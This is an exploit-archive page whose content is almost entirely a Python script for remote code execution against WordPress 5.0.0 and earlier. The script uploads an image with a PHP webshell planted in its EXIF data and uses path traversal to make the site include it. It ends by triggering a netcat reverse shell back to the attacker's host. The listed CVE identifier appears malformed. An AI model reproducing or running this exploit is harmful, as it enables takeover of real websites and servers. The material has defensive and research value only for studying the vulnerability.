wordpress 5.0.0 image remote code execution

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wordpress 5.0.0 image remote code execution Code Code...
# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution # Date: 2020-02-01 # Exploit Authors: OUSSAMA RAHALI ( aka V0lck3r) # Discovery Author : RIPSTECH Technology # Version: WordPress 5.0.0 and <= 4.9.8 . # References : CVE-2019-89242 | CVE-2019-89242 | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ #/usr/bin/env python3 import requests import re import sys from datetime import datetime banner = """ __ __ _ ____ ____ _____ \ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___ | _ \ / ___| ____| \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | | | _| \ V V / (_) | | | (_| | |_) | | | __/\__ \__ \ | _ <| |___| |___ \_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/ |_| \_\\____|_____| |_| 5.0.0 and <= 4.9.8 """ print(banner) print("usage :") print("=======") usage = 'python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>' print(usage) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] wp_theme = sys.argv[4] # wpscan results lhost = '' #attacker ip lport = '4141' #listening port date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/' imagename = 'gd.jpg' # ====== # Note : # ====== # It could be any jpg image, BUT there are some modifications first : # 1- image name as : "gd.jpg" # 2- place the image in the same directory as this exploit. # 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>" data = { 'log':username, 'pwd':password, 'wp-submit':'Log In', 'redirect_to':url+'wp-admin/', 'testcookie':1 } r = requests.post(url+'wp-login.php',data=data) if r.status_code == 200: print("[+] Login successful.\n") else: print("[-] Failed to login.") exit(0) cookies = r.cookies print("[+] Getting Wp Nonce ... ") res = requests.get(url+'wp-admin/media-new.php',cookies=cookies) wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) if len(wp_nonce_list) == 0 : print("[-] Failed to retrieve the _wpnonce \n") exit(0) else : wp_nonce = wp_nonce_list[0] print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n") print("[+] Uploading the image ... ") data = { 'name': 'gd.jpg', 'action': 'upload-attachment', '_wpnonce': wp_nonce } image = {'async-upload': (imagename, open(imagename, 'rb'))} r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies) if r_upload.status_code == 200: image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n") else : print("[-] Failed to receive a response for uploaded image ! try again . \n") exit(0) print("[+] Changing the path ... ") data = { '_wpnonce':_wp_nonce, 'action':'editpost', 'post_ID':image_id, 'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali' } res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) if res.status_code == 200: print("[+] Path has been changed successfully. \n") else : print("[-] Failed to change the path ! Make sure the theme is correcte .\n") exit(0) print("[+] Getting Ajax nonce ... ") data = { 'action':'query-attachments', 'post_id':0, 'query[item]':43, 'query[orderby]':'date', 'query[order]':'DESC', 'query[posts_per_page]':40, 'query[paged]':1 } res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text) if res.status_code == 200 and len(ajax_nonce_list) != 0 : ajax_nonce = ajax_nonce_list[0] print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n') else : print("[-] Failed to retrieve ajax_nonce.\n") exit(0) print("[+] Cropping the uploaded image ... ") data = { 'action':'crop-image', '_ajax_nonce':ajax_nonce, 'id':image_id, 'cropDetails[x1]':0, 'cropDetails[y1]':0, 'cropDetails[width]':200, 'cropDetails[height]':100, 'cropDetails[dst_width]':200, 'cropDetails[dst_height]':100 } res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies) if res.status_code == 200: print("[+] Done . \n") else : print("[-] Erorr ! Try again \n") exit(0) print("[+] Creating a new post to include the image... ") res = requests.post(url+'wp-admin/post-new.php', cookies=cookies) if res.status_code == 200: _wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0] post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0] print("[+] Post created successfully . \n") else : print("[-] Erorr ! Try again \n") exit(0) data={ '_wpnonce':_wpnonce, 'action':'editpost', 'post_ID':post_id, 'post_title':'RCE poc by v0lck3r', 'post_name':'RCE poc by v0lck3r', 'meta_input[_wp_page_template]':'cropped-rahali.jpg' } res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies) if res.status_code == 200: print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n') print("[+] Executing payload !") requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies) else : print("[-] Erorr ! Try again (maybe change the payload) \n") exit(0)

Wordpress 5.0.0 image remote code execution Vulnerability / Exploit Source : Wordpress 5.0.0 image remote code execution

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